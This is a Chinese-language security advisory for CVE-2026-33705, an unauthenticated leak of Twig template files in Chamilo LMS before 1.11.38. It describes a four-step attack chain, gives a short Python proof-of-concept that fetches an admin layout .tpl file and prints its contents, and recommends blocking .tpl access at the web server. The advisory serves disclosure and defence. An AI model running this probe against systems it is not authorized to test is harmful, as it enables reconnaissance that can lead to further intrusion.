CVE-2026-33705 CVSS 5.3 中危

CVE-2026-33705 Chamilo LMS敏感文件信息泄露漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33705

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Chamilo LMS

漏洞概述

Chamilo LMS 在 1.11.38 之前的版本中存在信息泄露漏洞。由于系统未正确配置访问控制策略，攻击者无需进行身份验证即可通过 HTTP GET 请求直接访问 Web 根目录下 `/main/template/default/` 路径中的 Twig 模板文件（.tpl）。这些模板文件通常包含应用程序的内部业务逻辑、关键变量名称、AJAX 接口地址以及管理面板的目录结构。泄露此类敏感信息将帮助攻击者深入了解系统架构，从而为实施更复杂的攻击提供便利。

技术细节

该漏洞的根本原因在于 Chamilo LMS 未能对 `/main/template/default/` 目录实施严格的访问控制策略。在 1.11.38 版本之前，系统未对 Twig 模板文件（.tpl）的请求进行身份验证或权限校验，导致攻击者可通过网络直接发送 HTTP GET 请求获取文件源码。这些模板文件中包含了服务器端的渲染逻辑、内部变量赋值、API 接口路径以及潜在的隐藏功能入口。泄露这些内部结构信息不仅暴露了系统的设计架构，还可能泄露硬编码的敏感配置。攻击者可利用这些信息进行定向侦察，识别出未授权的端点或逻辑缺陷，进而结合其他漏洞发起更深层次的攻击。

攻击链分析

STEP 1

侦察

识别目标是否使用了 Chamilo LMS 系统，并确定其版本号在 1.11.38 以下。

STEP 2

漏洞探测

构造针对 `/main/template/default/` 目录下特定 .tpl 文件的 HTTP GET 请求，发送至目标服务器。

STEP 3

信息获取

服务器返回模板文件的源代码，攻击者从中提取内部逻辑、变量名和 API 路径等敏感信息。

STEP 4

后续利用

根据泄露的信息分析系统架构，寻找其他潜在的漏洞入口（如未授权接口或逻辑漏洞）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(base_url):
    # Example target file path
    target_path = "/main/template/default/admin/layout.tpl"
    full_url = base_url + target_path

    try:
        # Send HTTP GET request without authentication
        response = requests.get(full_url, timeout=10)

        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Found at: {full_url}")
            # Check if response contains typical template syntax
            if "{%" in response.text or "{{" in response.text:
                print("[+] Template syntax detected in response.")
                print("[+] Content snippet:")
                print(response.text[:200])
                return True
        else:
            print(f"[-] Status Code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    check_vulnerability(target)

影响范围

Chamilo LMS < 1.11.38

防御指南

临时缓解措施

若无法立即升级，建议在 Web 服务器层面添加访问控制规则（如 .htaccess 或 Nginx location 块），明确拒绝外部用户对 `.tpl` 文件或 `/main/template/default/` 目录的直接请求，以防止敏感文件泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表